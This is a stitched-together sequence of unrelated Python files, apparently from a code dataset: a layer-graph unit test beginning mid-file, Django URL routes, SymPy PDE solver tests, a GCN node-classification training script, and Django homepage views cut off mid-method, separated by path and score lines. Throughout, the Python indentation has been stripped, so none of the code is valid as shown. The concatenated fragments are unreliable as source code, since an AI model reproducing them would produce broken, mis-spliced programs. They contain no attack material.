with self.assertRaisesRegex(KeyError, 'Network: .*input.*'):
network.set_input_layer(InputLayer(3, 24))
def test_add(self):
''' Modifier add. '''
self.assertEqual(len(self.network), 3)
self.network.add('f2', FCLayer(64, 2000, 7), prevs='p1')
self.network.add('f3', FCLayer(3000, 1000), prevs=('f1', 'f2'))
self.network.add('e4', EltwiseLayer(1000, 1, 2), prevs=('f1', 'f3'))
self.network.add('f4', FCLayer(1000, 1000), prevs='e4')
self.assertEqual(len(self.network), 7)
def test_add_same_key(self):
''' Modifier add same key. '''
network = Network('test_net')
network.set_input_layer(InputLayer(3, 224))
network.add('c1', ConvLayer(3, 64, 224, 3))
with self.assertRaisesRegex(KeyError, 'Network: .*c1.*'):
network.add('c1', ConvLayer(64, 128, 224, 3))
def test_add_no_input(self):
''' Modifier add no input. '''
network = Network('test_net')
with self.assertRaisesRegex(RuntimeError, 'Network: .*input.*'):
network.add('c1', ConvLayer(3, 64, 224, 3))
def test_add_no_prev(self):
''' Modifier add no prevs. '''
network = Network('test_net')
network.set_input_layer(InputLayer(3, 224))
network.add('c1', ConvLayer(3, 64, 224, 3))
with self.assertRaisesRegex(KeyError, 'Network: .*prev.*p1.*'):
network.add('p1', PoolingLayer(64, 7, 32), prevs='p1')
def test_add_invalid_type(self):
''' Modifier add invalid type. '''
network = Network('test_net')
network.set_input_layer(InputLayer(3, 224))
with self.assertRaisesRegex(TypeError, 'Network: .*Layer.*'):
network.add('c1', (3, 64, 224, 3))
def test_add_unmatch_prev(self):
''' Modifier add unmatch prevs. '''
network = Network('test_net')
network.set_input_layer(InputLayer(3, 224))
network.add('c1', ConvLayer(3, 64, 224, 3))
with self.assertRaisesRegex(ValueError,
'Network: .*c1.*p1.*mismatch fmap.*'):
network.add('p1', PoolingLayer(64, 7, 2))
self.assertEqual(len(network), 1)
with self.assertRaisesRegex(ValueError,
'Network: .*c1.*c2.*mismatch fmap.*'):
network.add('c2', ConvLayer(64, 128, 220, 3))
self.assertEqual(len(network), 1)
with self.assertRaisesRegex(ValueError, 'Network: .*c1.*prev.*p1.*'):
network.add('p1', PoolingLayer(32, 7, 32))
self.assertEqual(len(network), 1)
with self.assertRaisesRegex(ValueError, 'Network: .*c1.*prev.*c2.*'):
network.add('c2', ConvLayer(32, 128, 224, 3))
self.assertEqual(len(network), 1)
network.add('c2', ConvLayer(64, 128, 224, 3))
with self.assertRaisesRegex(ValueError,
r'Network: .*c1 | c2.*prev.*p1.*'):
network.add('p1', PoolingLayer(128, 7, 32), prevs=('c1', 'c2'))
self.assertEqual(len(network), 2)
def test_add_ext(self):
''' Modifier add_ext. '''
self.assertEqual(len(self.network), 3)
self.network.add_ext('e0', InputLayer(3, 24))
self.assertIsInstance(self.network['e0'], InputLayer)
self.assertEqual(self.network['e0'].nofm, 3)
self.assertEqual(self.network['e0'].hofm, 24)
self.assertEqual(self.network['e0'].wofm, 24)
self.network.add_ext('e1', InputLayer(5, (16, 20)))
self.assertIsInstance(self.network['e1'], InputLayer)
self.assertEqual(self.network['e1'].nofm, 5)
self.assertEqual(self.network['e1'].hofm, 16)
self.assertEqual(self.network['e1'].wofm, 20)
self.assertEqual(len(self.network), 3)
def test_add_ext_same_key(self):
''' Modifier add_ext same key. '''
network = Network('test_net')
network.add_ext('e0', InputLayer(3, 24))
with self.assertRaisesRegex(KeyError, 'Network: .*ext.*'):
network.add_ext('e0', InputLayer(3, 24))
def test_add_ext_invalid_type(self):
''' Modifier add_ext invalid type. '''
network = Network('test_net')
with self.assertRaisesRegex(TypeError, 'Network: .*external layer.*'):
network.add_ext('e0', Layer(3, 24))
with self.assertRaisesRegex(TypeError, 'Network: .*external layer.*'):
network.add_ext('e0', ConvLayer(3, 8, 24, 3))
def test_prevs(self):
''' Get prevs. '''
self.network.add('f2', FCLayer(64, 2000, 7), prevs='p1')
self.network.add('f3', FCLayer(3000, 1000), prevs=('f1', 'f2'))
prevs = self.network.prevs('f1')
self.assertTupleEqual(prevs, ('p1',))
prevs = self.network.prevs('f2')
self.assertTupleEqual(prevs, ('p1',))
prevs = self.network.prevs('f3')
self.assertTupleEqual(prevs, ('f1', 'f2'))
def test_prevs_first(self):
''' Get prevs first layer. '''
self.network.add('c2', ConvLayer(3, 3, 224, 1),
prevs=self.network.INPUT_LAYER_KEY)
prevs = self.network.prevs('c1')
self.assertTupleEqual(prevs, (None,))
prevs = self.network.prevs('c2')
self.assertTupleEqual(prevs, (None,))
def test_prevs_input(self):
''' Get prevs input layer. '''
with self.assertRaisesRegex(ValueError, 'Network: .*input.*'):
_ = self.network.prevs(self.network.INPUT_LAYER_KEY)
def test_prevs_ext_next(self):
''' Get prevs next layer of an external layer. '''
self.network.add_ext('e0', InputLayer(3, 224))
self.network.add('n', ConvLayer(6, 3, 224, 1),
prevs=(self.network.INPUT_LAYER_KEY, 'e0'))
prevs = self.network.prevs('n')
self.assertTupleEqual(prevs, (None, 'e0'))
def test_prevs_ext(self):
''' Get prevs external layer. '''
self.network.add_ext('e0', InputLayer(3, 3))
with self.assertRaisesRegex(ValueError, 'Network: .*ext.*'):
_ = self.network.prevs('e0')
def test_nexts(self):
''' Get nexts. '''
self.network.add('f2', FCLayer(64, 2000, 7), prevs='p1')
self.network.add('f3', FCLayer(3000, 1000), prevs=('f1', 'f2'))
self.network.add('e4', EltwiseLayer(1000, 1, 2), prevs=('f1', 'f3'))
self.network.add('f4', FCLayer(1000, 1000), prevs='e4')
nexts = self.network.nexts('p1')
self.assertTupleEqual(nexts, ('f1', 'f2'))
nexts = self.network.nexts('f1')
self.assertTupleEqual(nexts, ('f3', 'e4'))
nexts = self.network.nexts('f2')
self.assertTupleEqual(nexts, ('f3',))
nexts = self.network.nexts('f3')
self.assertTupleEqual(nexts, ('e4',))
def test_nexts_last(self):
        ''' Get nexts last layer. '''
nexts = self.network.nexts('f1')
self.assertTupleEqual(nexts, (None,))
self.network.add('f2', FCLayer(64, 2000, 7), prevs='p1')
nexts = self.network.nexts('f1')
self.assertTupleEqual(nexts, (None,))
nexts = self.network.nexts('f2')
self.assertTupleEqual(nexts, (None,))
def test_nexts_input(self):
''' Get nexts input layer. '''
nexts = self.network.nexts(self.network.INPUT_LAYER_KEY)
self.assertTupleEqual(nexts, ('c1',))
self.network.add('c2', ConvLayer(3, 3, 224, 1),
prevs=self.network.INPUT_LAYER_KEY)
self.network.add('c3', ConvLayer(6, 4, 224, 1),
prevs=(self.network.INPUT_LAYER_KEY, 'c2'))
nexts = self.network.nexts(self.network.INPUT_LAYER_KEY)
self.assertTupleEqual(nexts, ('c1', 'c2', 'c3'))
def test_firsts(self):
''' Get firsts. '''
firsts = self.network.firsts()
self.assertTupleEqual(firsts, ('c1',))
self.network.add('c2', ConvLayer(3, 3, 224, 1),
prevs=self.network.INPUT_LAYER_KEY)
self.network.add('c3', ConvLayer(6, 4, 224, 1),
prevs=(self.network.INPUT_LAYER_KEY, 'c2'))
firsts = self.network.firsts()
self.assertTupleEqual(firsts, ('c1', 'c2'))
self.assertIn('c1', firsts)
self.assertNotIn('c3', firsts)
def test_firsts_ext(self):
''' Get firsts with external layers. '''
self.network.add_ext('e0', InputLayer(3, 224))
self.network.add('c2', ConvLayer(3, 3, 224, 1), prevs=('e0',))
self.network.add('c3', ConvLayer(67, 3, 224, 1), prevs=('e0', 'c1'))
self.network.add('c4', ConvLayer(6, 3, 224, 1),
prevs=(self.network.INPUT_LAYER_KEY, 'e0',))
firsts = self.network.firsts()
self.assertIn('c2', firsts)
self.assertNotIn('c3', firsts)
self.assertIn('c4', firsts)
def test_lasts(self):
''' Get lasts. '''
lasts = self.network.lasts()
self.assertTupleEqual(lasts, ('f1',))
self.network.add('f2', FCLayer(64, 2000, 7), prevs='p1')
lasts = self.network.lasts()
self.assertTupleEqual(lasts, ('f1', 'f2'))
def test_ext_layers(self):
''' Get external layers. '''
self.assertTupleEqual(self.network.ext_layers(), tuple())
self.network.add_ext('e0', InputLayer(3, 224))
self.assertTupleEqual(self.network.ext_layers(), ('e0',))
self.network.add_ext('e1', InputLayer(3, 224))
self.assertTupleEqual(self.network.ext_layers(), ('e0', 'e1'))
def test_contains(self):
''' Whether contains. '''
self.assertIn('c1', self.network)
self.assertIn('p1', self.network)
self.assertIn('f1', self.network)
self.assertNotIn('f2', self.network)
self.network.add('f2', FCLayer(64, 2000, 7), prevs='p1')
self.assertIn('f2', self.network)
def test_len(self):
''' Accessor len. '''
self.assertEqual(len(self.network), 3)
network = Network('test_net')
self.assertEqual(len(network), 0)
network.set_input_layer(InputLayer(3, 224))
self.assertEqual(len(network), 0)
network.add('c1', ConvLayer(3, 4, 224, 1))
self.assertEqual(len(network), 1)
self.network.add('f2', FCLayer(64, 2000, 7), prevs='p1')
self.assertEqual(len(self.network), 4)
self.network.add('f3', FCLayer(3000, 1000), prevs=('f1', 'f2'))
self.assertEqual(len(self.network), 5)
self.network.add('e4', EltwiseLayer(1000, 1, 2), prevs=('f1', 'f3'))
self.assertEqual(len(self.network), 6)
self.network.add('f4', FCLayer(1000, 1000), prevs='e4')
self.assertEqual(len(self.network), 7)
def test_iter(self):
''' Accessor iter. '''
num = 0
for layer in self.network:
self.assertIn(layer, self.network)
self.assertIsInstance(self.network[layer], Layer)
num += 1
self.assertEqual(len(self.network), num)
network = Network('test_net')
network.set_input_layer(InputLayer(3, 224))
with self.assertRaises(StopIteration):
_ = next(iter(network))
def test_contains_ext(self):
''' Whether contains external layer. '''
self.assertNotIn('e0', self.network)
self.network.add_ext('e0', InputLayer(3, 224))
self.assertIn('e0', self.network)
def test_len_ext(self):
''' Accessor len external layer. '''
self.assertEqual(len(self.network), 3)
self.network.add_ext('e0', InputLayer(3, 224))
self.assertEqual(len(self.network), 3)
def test_iter_ext(self):
''' Accessor iter external layer. '''
self.network.add_ext('e0', InputLayer(3, 224))
for layer in self.network:
self.assertNotEqual(layer, 'e0')
def test_getitem(self):
''' Accessor getitem. '''
self.assertIsInstance(self.network['c1'], ConvLayer)
self.assertIsInstance(self.network['p1'], PoolingLayer)
self.assertIsInstance(self.network['f1'], FCLayer)
def test_getitem_error(self):
''' Accessor getitem. '''
with self.assertRaisesRegex(KeyError, 'Network: .*c2.*'):
_ = self.network['c2']
def test_str(self):
''' Accessor str. '''
string = str(self.network)
for layer in self.network:
self.assertIn(layer, string)
| 2.515625 | 3 |
apps/division/urls.py | Jingil-Integrated-Management/JIM_backend | 0 | 6924 | from django.urls import path
from .views import DivisionListCreateAPIView, DivisionRetrieveUpdateDestroyAPIView, MainDivisionListAPIView
urlpatterns = [
path('division/', DivisionListCreateAPIView.as_view()),
path('division/<division_pk>', DivisionRetrieveUpdateDestroyAPIView.as_view()),
path('division/main/', MainDivisionListAPIView.as_view()),
]
| 1.601563 | 2 |
sympy/solvers/tests/test_pde.py | nashalex/sympy | 8,323 | 6925 | <gh_stars>1000+
from sympy import (Derivative as D, Eq, exp, sin,
Function, Symbol, symbols, cos, log)
from sympy.core import S
from sympy.solvers.pde import (pde_separate, pde_separate_add, pde_separate_mul,
pdsolve, classify_pde, checkpdesol)
from sympy.testing.pytest import raises
a, b, c, x, y = symbols('a b c x y')
def test_pde_separate_add():
x, y, z, t = symbols("x,y,z,t")
F, T, X, Y, Z, u = map(Function, 'FTXYZu')
eq = Eq(D(u(x, t), x), D(u(x, t), t)*exp(u(x, t)))
res = pde_separate_add(eq, u(x, t), [X(x), T(t)])
assert res == [D(X(x), x)*exp(-X(x)), D(T(t), t)*exp(T(t))]
def test_pde_separate():
x, y, z, t = symbols("x,y,z,t")
F, T, X, Y, Z, u = map(Function, 'FTXYZu')
eq = Eq(D(u(x, t), x), D(u(x, t), t)*exp(u(x, t)))
raises(ValueError, lambda: pde_separate(eq, u(x, t), [X(x), T(t)], 'div'))
def test_pde_separate_mul():
x, y, z, t = symbols("x,y,z,t")
c = Symbol("C", real=True)
Phi = Function('Phi')
F, R, T, X, Y, Z, u = map(Function, 'FRTXYZu')
r, theta, z = symbols('r,theta,z')
# Something simple :)
eq = Eq(D(F(x, y, z), x) + D(F(x, y, z), y) + D(F(x, y, z), z), 0)
# Duplicate arguments in functions
raises(
ValueError, lambda: pde_separate_mul(eq, F(x, y, z), [X(x), u(z, z)]))
# Wrong number of arguments
raises(ValueError, lambda: pde_separate_mul(eq, F(x, y, z), [X(x), Y(y)]))
# Wrong variables: [x, y] -> [x, z]
raises(
ValueError, lambda: pde_separate_mul(eq, F(x, y, z), [X(t), Y(x, y)]))
assert pde_separate_mul(eq, F(x, y, z), [Y(y), u(x, z)]) == \
[D(Y(y), y)/Y(y), -D(u(x, z), x)/u(x, z) - D(u(x, z), z)/u(x, z)]
assert pde_separate_mul(eq, F(x, y, z), [X(x), Y(y), Z(z)]) == \
[D(X(x), x)/X(x), -D(Z(z), z)/Z(z) - D(Y(y), y)/Y(y)]
# wave equation
wave = Eq(D(u(x, t), t, t), c**2*D(u(x, t), x, x))
res = pde_separate_mul(wave, u(x, t), [X(x), T(t)])
assert res == [D(X(x), x, x)/X(x), D(T(t), t, t)/(c**2*T(t))]
# Laplace equation in cylindrical coords
eq = Eq(1/r * D(Phi(r, theta, z), r) + D(Phi(r, theta, z), r, 2) +
1/r**2 * D(Phi(r, theta, z), theta, 2) + D(Phi(r, theta, z), z, 2), 0)
# Separate z
res = pde_separate_mul(eq, Phi(r, theta, z), [Z(z), u(theta, r)])
assert res == [D(Z(z), z, z)/Z(z),
-D(u(theta, r), r, r)/u(theta, r) -
D(u(theta, r), r)/(r*u(theta, r)) -
D(u(theta, r), theta, theta)/(r**2*u(theta, r))]
# Lets use the result to create a new equation...
eq = Eq(res[1], c)
# ...and separate theta...
res = pde_separate_mul(eq, u(theta, r), [T(theta), R(r)])
assert res == [D(T(theta), theta, theta)/T(theta),
-r*D(R(r), r)/R(r) - r**2*D(R(r), r, r)/R(r) - c*r**2]
# ...or r...
res = pde_separate_mul(eq, u(theta, r), [R(r), T(theta)])
assert res == [r*D(R(r), r)/R(r) + r**2*D(R(r), r, r)/R(r) + c*r**2,
-D(T(theta), theta, theta)/T(theta)]
def test_issue_11726():
x, t = symbols("x t")
f = symbols("f", cls=Function)
X, T = symbols("X T", cls=Function)
u = f(x, t)
eq = u.diff(x, 2) - u.diff(t, 2)
res = pde_separate(eq, u, [T(x), X(t)])
assert res == [D(T(x), x, x)/T(x),D(X(t), t, t)/X(t)]
def test_pde_classify():
# When more number of hints are added, add tests for classifying here.
f = Function('f')
eq1 = a*f(x,y) + b*f(x,y).diff(x) + c*f(x,y).diff(y)
eq2 = 3*f(x,y) + 2*f(x,y).diff(x) + f(x,y).diff(y)
eq3 = a*f(x,y) + b*f(x,y).diff(x) + 2*f(x,y).diff(y)
eq4 = x*f(x,y) + f(x,y).diff(x) + 3*f(x,y).diff(y)
eq5 = x**2*f(x,y) + x*f(x,y).diff(x) + x*y*f(x,y).diff(y)
eq6 = y*x**2*f(x,y) + y*f(x,y).diff(x) + f(x,y).diff(y)
for eq in [eq1, eq2, eq3]:
assert classify_pde(eq) == ('1st_linear_constant_coeff_homogeneous',)
for eq in [eq4, eq5, eq6]:
assert classify_pde(eq) == ('1st_linear_variable_coeff',)
def test_checkpdesol():
f, F = map(Function, ['f', 'F'])
eq1 = a*f(x,y) + b*f(x,y).diff(x) + c*f(x,y).diff(y)
eq2 = 3*f(x,y) + 2*f(x,y).diff(x) + f(x,y).diff(y)
eq3 = a*f(x,y) + b*f(x,y).diff(x) + 2*f(x,y).diff(y)
for eq in [eq1, eq2, eq3]:
assert checkpdesol(eq, pdsolve(eq))[0]
eq4 = x*f(x,y) + f(x,y).diff(x) + 3*f(x,y).diff(y)
eq5 = 2*f(x,y) + 1*f(x,y).diff(x) + 3*f(x,y).diff(y)
eq6 = f(x,y) + 1*f(x,y).diff(x) + 3*f(x,y).diff(y)
assert checkpdesol(eq4, [pdsolve(eq5), pdsolve(eq6)]) == [
(False, (x - 2)*F(3*x - y)*exp(-x/S(5) - 3*y/S(5))),
(False, (x - 1)*F(3*x - y)*exp(-x/S(10) - 3*y/S(10)))]
for eq in [eq4, eq5, eq6]:
assert checkpdesol(eq, pdsolve(eq))[0]
sol = pdsolve(eq4)
sol4 = Eq(sol.lhs - sol.rhs, 0)
raises(NotImplementedError, lambda:
checkpdesol(eq4, sol4, solve_for_func=False))
def test_solvefun():
f, F, G, H = map(Function, ['f', 'F', 'G', 'H'])
eq1 = f(x,y) + f(x,y).diff(x) + f(x,y).diff(y)
assert pdsolve(eq1) == Eq(f(x, y), F(x - y)*exp(-x/2 - y/2))
assert pdsolve(eq1, solvefun=G) == Eq(f(x, y), G(x - y)*exp(-x/2 - y/2))
assert pdsolve(eq1, solvefun=H) == Eq(f(x, y), H(x - y)*exp(-x/2 - y/2))
def test_pde_1st_linear_constant_coeff_homogeneous():
f, F = map(Function, ['f', 'F'])
u = f(x, y)
eq = 2*u + u.diff(x) + u.diff(y)
assert classify_pde(eq) == ('1st_linear_constant_coeff_homogeneous',)
sol = pdsolve(eq)
assert sol == Eq(u, F(x - y)*exp(-x - y))
assert checkpdesol(eq, sol)[0]
eq = 4 + (3*u.diff(x)/u) + (2*u.diff(y)/u)
assert classify_pde(eq) == ('1st_linear_constant_coeff_homogeneous',)
sol = pdsolve(eq)
assert sol == Eq(u, F(2*x - 3*y)*exp(-S(12)*x/13 - S(8)*y/13))
assert checkpdesol(eq, sol)[0]
eq = u + (6*u.diff(x)) + (7*u.diff(y))
assert classify_pde(eq) == ('1st_linear_constant_coeff_homogeneous',)
sol = pdsolve(eq)
assert sol == Eq(u, F(7*x - 6*y)*exp(-6*x/S(85) - 7*y/S(85)))
assert checkpdesol(eq, sol)[0]
eq = a*u + b*u.diff(x) + c*u.diff(y)
sol = pdsolve(eq)
assert checkpdesol(eq, sol)[0]
def test_pde_1st_linear_constant_coeff():
f, F = map(Function, ['f', 'F'])
u = f(x,y)
eq = -2*u.diff(x) + 4*u.diff(y) + 5*u - exp(x + 3*y)
sol = pdsolve(eq)
assert sol == Eq(f(x,y),
(F(4*x + 2*y)*exp(x/2) + exp(x + 4*y)/15)*exp(-y))
assert classify_pde(eq) == ('1st_linear_constant_coeff',
'1st_linear_constant_coeff_Integral')
assert checkpdesol(eq, sol)[0]
eq = (u.diff(x)/u) + (u.diff(y)/u) + 1 - (exp(x + y)/u)
sol = pdsolve(eq)
assert sol == Eq(f(x, y), F(x - y)*exp(-x/2 - y/2) + exp(x + y)/3)
assert classify_pde(eq) == ('1st_linear_constant_coeff',
'1st_linear_constant_coeff_Integral')
assert checkpdesol(eq, sol)[0]
eq = 2*u + -u.diff(x) + 3*u.diff(y) + sin(x)
sol = pdsolve(eq)
assert sol == Eq(f(x, y),
F(3*x + y)*exp(x/5 - 3*y/5) - 2*sin(x)/5 - cos(x)/5)
assert classify_pde(eq) == ('1st_linear_constant_coeff',
'1st_linear_constant_coeff_Integral')
assert checkpdesol(eq, sol)[0]
eq = u + u.diff(x) + u.diff(y) + x*y
sol = pdsolve(eq)
assert sol.expand() == Eq(f(x, y),
x + y + (x - y)**2/4 - (x + y)**2/4 + F(x - y)*exp(-x/2 - y/2) - 2).expand()
assert classify_pde(eq) == ('1st_linear_constant_coeff',
'1st_linear_constant_coeff_Integral')
assert checkpdesol(eq, sol)[0]
eq = u + u.diff(x) + u.diff(y) + log(x)
assert classify_pde(eq) == ('1st_linear_constant_coeff',
'1st_linear_constant_coeff_Integral')
def test_pdsolve_all():
f, F = map(Function, ['f', 'F'])
u = f(x,y)
eq = u + u.diff(x) + u.diff(y) + x**2*y
sol = pdsolve(eq, hint = 'all')
keys = ['1st_linear_constant_coeff',
'1st_linear_constant_coeff_Integral', 'default', 'order']
assert sorted(sol.keys()) == keys
assert sol['order'] == 1
assert sol['default'] == '1st_linear_constant_coeff'
assert sol['1st_linear_constant_coeff'].expand() == Eq(f(x, y),
-x**2*y + x**2 + 2*x*y - 4*x - 2*y + F(x - y)*exp(-x/2 - y/2) + 6).expand()
def test_pdsolve_variable_coeff():
f, F = map(Function, ['f', 'F'])
u = f(x, y)
eq = x*(u.diff(x)) - y*(u.diff(y)) + y**2*u - y**2
sol = pdsolve(eq, hint="1st_linear_variable_coeff")
assert sol == Eq(u, F(x*y)*exp(y**2/2) + 1)
assert checkpdesol(eq, sol)[0]
eq = x**2*u + x*u.diff(x) + x*y*u.diff(y)
sol = pdsolve(eq, hint='1st_linear_variable_coeff')
assert sol == Eq(u, F(y*exp(-x))*exp(-x**2/2))
assert checkpdesol(eq, sol)[0]
eq = y*x**2*u + y*u.diff(x) + u.diff(y)
sol = pdsolve(eq, hint='1st_linear_variable_coeff')
assert sol == Eq(u, F(-2*x + y**2)*exp(-x**3/3))
assert checkpdesol(eq, sol)[0]
eq = exp(x)**2*(u.diff(x)) + y
sol = pdsolve(eq, hint='1st_linear_variable_coeff')
assert sol == Eq(u, y*exp(-2*x)/2 + F(y))
assert checkpdesol(eq, sol)[0]
eq = exp(2*x)*(u.diff(y)) + y*u - u
sol = pdsolve(eq, hint='1st_linear_variable_coeff')
assert sol == Eq(u, F(x)*exp(-y*(y - 2)*exp(-2*x)/2))
| 2.421875 | 2 |
GCN/GCN.py | EasternJournalist/learn-deep-learning | 6 | 6926 | import torch
import torch.nn.functional as F
import pandas as pd
import numpy as np
from torch_geometric.data import Data
from torch_geometric.nn import GCNConv, PairNorm
from torch_geometric.utils.undirected import to_undirected
import random
import matplotlib.pyplot as plt
data_name = 'citeseer' # 'cora' or 'citeseer'
data_edge_path = f'datasets/{data_name}/{data_name}.cites'
data_content_path = f'datasets/{data_name}/{data_name}.content'
raw_content = pd.read_table(data_content_path, header=None, dtype={0:np.str})
raw_edge = pd.read_table(data_edge_path, header=None, dtype=np.str)
paper_ids = raw_content[0]
paper_id_map = {}
for i, pp_id in enumerate(paper_ids):
paper_id_map[pp_id] = i
edge_index = torch.from_numpy(raw_edge.apply(lambda col: col.map(paper_id_map)).dropna().values).long().t().contiguous()
x = torch.from_numpy(raw_content.values[:, 1:-1].astype(np.float)).float()
labels = np.unique(raw_content[raw_content.keys()[-1]]).tolist()
y = torch.from_numpy(raw_content[raw_content.keys()[-1]].map(lambda x: labels.index(x)).values).long()
def get_mask(y:torch.tensor):
train_mask = torch.tensor([False] * y.shape[0])
for i in torch.unique(y).unbind():
temp = torch.arange(0, y.shape[0])[y == i].tolist()
random.shuffle(temp)
train_mask[temp[:30]] = True
train_mask = torch.tensor(train_mask)
test_mask = train_mask == False
return train_mask, test_mask
train_mask, test_mask = get_mask(y)
data = Data(x=x, edge_index=edge_index, y=y, train_mask=train_mask, test_mask=test_mask)
def drop_edge(edge_index, keep_ratio:float=1.):
num_keep = int(keep_ratio * edge_index.shape[1])
temp = [True] * num_keep + [False] * (edge_index.shape[1] - num_keep)
random.shuffle(temp)
return edge_index[:, temp]
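# Quick illustration of drop_edge (the selection is random, so only the shape
# is deterministic): with a 4-edge graph and keep_ratio=0.5, int(0.5 * 4) = 2
# columns survive.
#
#   example_edges = torch.tensor([[0, 1, 2, 3], [1, 2, 3, 0]])
#   drop_edge(example_edges, keep_ratio=0.5).shape  # -> torch.Size([2, 2])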
class GCNNodeClassifier(torch.nn.Module):
def __init__(self,
dim_features,
num_classes,
num_layers,
add_self_loops:bool=True,
use_pairnorm:bool=False,
drop_edge:float=1.,
activation:str='relu',
undirected:bool=False
):
super(GCNNodeClassifier, self).__init__()
dim_hidden = 32
self.gconvs = torch.nn.ModuleList(
[GCNConv(in_channels=dim_features, out_channels=dim_hidden, add_self_loops=add_self_loops)]
+ [GCNConv(in_channels=dim_hidden, out_channels=dim_hidden, add_self_loops=add_self_loops) for i in range(num_layers - 2)]
)
self.final_conv = GCNConv(in_channels=dim_hidden, out_channels=num_classes, add_self_loops=add_self_loops)
self.use_pairnorm = use_pairnorm
if self.use_pairnorm:
self.pairnorm = PairNorm()
self.drop_edge = drop_edge
activations_map = {'relu':torch.relu, 'tanh':torch.tanh, 'sigmoid':torch.sigmoid, 'leaky_relu':torch.nn.LeakyReLU(0.1)}
self.activation_fn = activations_map[activation]
def forward(self, x, edge_index):
for l in self.gconvs:
edges = drop_edge(edge_index, self.drop_edge)
x = l(x, edges)
if self.use_pairnorm:
x = self.pairnorm(x)
x = self.activation_fn(x)
x = self.final_conv(x, edge_index)
return x
def eval_acc(y_pred, y):
return ((torch.argmax(y_pred, dim=-1) == y).float().sum() / y.shape[0]).item()
num_epochs = 100
test_cases = [
{'num_layers':2, 'add_self_loops':True, 'use_pairnorm':False, 'drop_edge':1., 'activation':'relu', 'undirected':False},
# num layers
{'num_layers':4, 'add_self_loops':True, 'use_pairnorm':False, 'drop_edge':1., 'activation':'relu', 'undirected':False},
{'num_layers':6, 'add_self_loops':True, 'use_pairnorm':False, 'drop_edge':1., 'activation':'relu', 'undirected':False},
# self loop
{'num_layers':2, 'add_self_loops':False, 'use_pairnorm':False, 'drop_edge':1., 'activation':'relu', 'undirected':False},
# pair norm
{'num_layers':2, 'add_self_loops':True, 'use_pairnorm':True, 'drop_edge':1., 'activation':'relu', 'undirected':False},
{'num_layers':4, 'add_self_loops':True, 'use_pairnorm':True, 'drop_edge':1., 'activation':'relu', 'undirected':False},
{'num_layers':6, 'add_self_loops':True, 'use_pairnorm':True, 'drop_edge':1., 'activation':'relu', 'undirected':False},
# drop edge
{'num_layers':2, 'add_self_loops':True, 'use_pairnorm':False, 'drop_edge':0.6, 'activation':'relu', 'undirected':False},
{'num_layers':4, 'add_self_loops':True, 'use_pairnorm':False, 'drop_edge':0.6, 'activation':'relu', 'undirected':False},
# activation fn
{'num_layers':2, 'add_self_loops':True, 'use_pairnorm':False, 'drop_edge':1., 'activation':'tanh', 'undirected':False},
{'num_layers':2, 'add_self_loops':True, 'use_pairnorm':False, 'drop_edge':1., 'activation':'leaky_relu', 'undirected':False},
# undirected
{'num_layers':2, 'add_self_loops':True, 'use_pairnorm':False, 'drop_edge':1., 'activation':'relu', 'undirected':True},
{'num_layers':4, 'add_self_loops':True, 'use_pairnorm':True, 'drop_edge':1., 'activation':'relu', 'undirected':True},
{'num_layers':4, 'add_self_loops':True, 'use_pairnorm':False, 'drop_edge':0.8, 'activation':'relu', 'undirected':True},
]
for i_case, kwargs in enumerate(test_cases):
print(f'Test Case {i_case:>2}')
model = GCNNodeClassifier(x.shape[1], len(labels), **kwargs)
optimizer = torch.optim.Adam(model.parameters(), lr=1e-3)
history_test_acc = []
input_edge_index = to_undirected(edge_index) if kwargs['undirected'] else edge_index
for i_epoch in range(0, num_epochs):
print(f'Epoch {i_epoch:>3} ', end='')
y_pred = model(x, input_edge_index)
train_acc = eval_acc(y_pred[train_mask], y[train_mask])
# Train
loss = F.cross_entropy(y_pred[train_mask], y[train_mask])
optimizer.zero_grad()
loss.backward()
optimizer.step()
# Test
test_acc = eval_acc(y_pred[test_mask], y[test_mask])
history_test_acc.append(test_acc)
print(f'Train Acc = {train_acc}. Test Acc = {test_acc}')
kwargs['best_acc'] = max(history_test_acc)
plt.plot(list(range(num_epochs)), history_test_acc, label=f'case_{str(i_case).zfill(2)}')
plt.legend()
plt.savefig(f'{data_name}-HistoryAcc.jpg')
pd.DataFrame(test_cases).to_csv(f'{data_name}-Result.csv')
| 2.265625 | 2 |
esg_leipzig_homepage_2015/views.py | ESG-Leipzig/Homepage-2015 | 0 | 6927 | import datetime
import json
from django.conf import settings
from django.http import Http404
from django.utils import timezone
from django.views import generic
from .models import Event, FlatPage, News
class HomeView(generic.ListView):
"""
View for the first page called 'Home'.
"""
context_object_name = 'event_list'
model = Event
template_name = 'home.html'
def get_queryset(self):
"""
Returns a queryset of all future events that should appear on home.
Uses settings.EVENT_DELAY_IN_MINUTES to determine the range.
"""
time_to_hide = timezone.now() - datetime.timedelta(
minutes=settings.EVENT_DELAY_IN_MINUTES)
queryset = super().get_queryset().filter(begin__gte=time_to_hide)
result = []
for event in queryset:
time_to_show = timezone.now() + datetime.timedelta(
days=event.on_home_before_begin)
if event.on_home_before_begin > 0 and event.begin <= time_to_show:
result.append(event)
return result
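    # Worked example of the two windows above (settings value is illustrative):
    # with EVENT_DELAY_IN_MINUTES = 120, an event that began 90 minutes ago is
    # still listed, and an event with on_home_before_begin = 7 only appears once
    # its begin date is at most 7 days away.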
def get_context_data(self, **context):
"""
Adds all news to the context.
"""
news_list = News.objects.all()
return super().get_context_data(news_list=news_list, **context)
class CalendarView(generic.ListView):
"""
View for a calendar with all events.
"""
model = Event
template_name = 'calendar.html'
def get_context_data(self, **context):
"""
Returns the template context. Adds event data as JSON for use in
Javascript calendar.
"""
context = super().get_context_data(**context)
event_list = []
for event in context['event_list']:
event_dict = {
'title': event.title,
'start': event.begin.isoformat(),
'description': event.content,
'className': event.css_class_name}
if event.duration:
event_dict['end'] = event.end.isoformat()
event_list.append(event_dict)
context['event_list_json'] = json.dumps(event_list)
return context
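# Shape of the JSON handed to the Javascript calendar by the view above
# (field values are made up):
#
#   [{"title": "Semestereroeffnung", "start": "2015-04-13T19:00:00",
#     "description": "...", "className": "label-info",
#     "end": "2015-04-13T21:00:00"}]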
class FlatPageView(generic.DetailView):
"""
View for static pages.
"""
model = FlatPage
def get_object(self, queryset=None):
"""
Returns the flatpage instance. Raises Http404 if inexistent.
"""
queryset = queryset or self.get_queryset()
url = self.kwargs.get('url')
for flatpage in queryset.filter(slug=url.split('/')[-1]):
if flatpage.get_absolute_url().strip('/') == url:
obj = flatpage
break
else:
raise Http404
return obj
def get_template_names(self):
"""
Returns the template names for the view as list. The name
'flatpage_default.html' is always appended.
"""
template_names = []
if self.object.template_name:
template_names.append(self.object.template_name)
template_names.append('flatpage_default.html')
return template_names
def get_context_data(self, **context):
"""
        Returns the template context. Adds breadcrumb to it if necessary.
"""
context = super().get_context_data(**context)
parent = context['flatpage'].parent
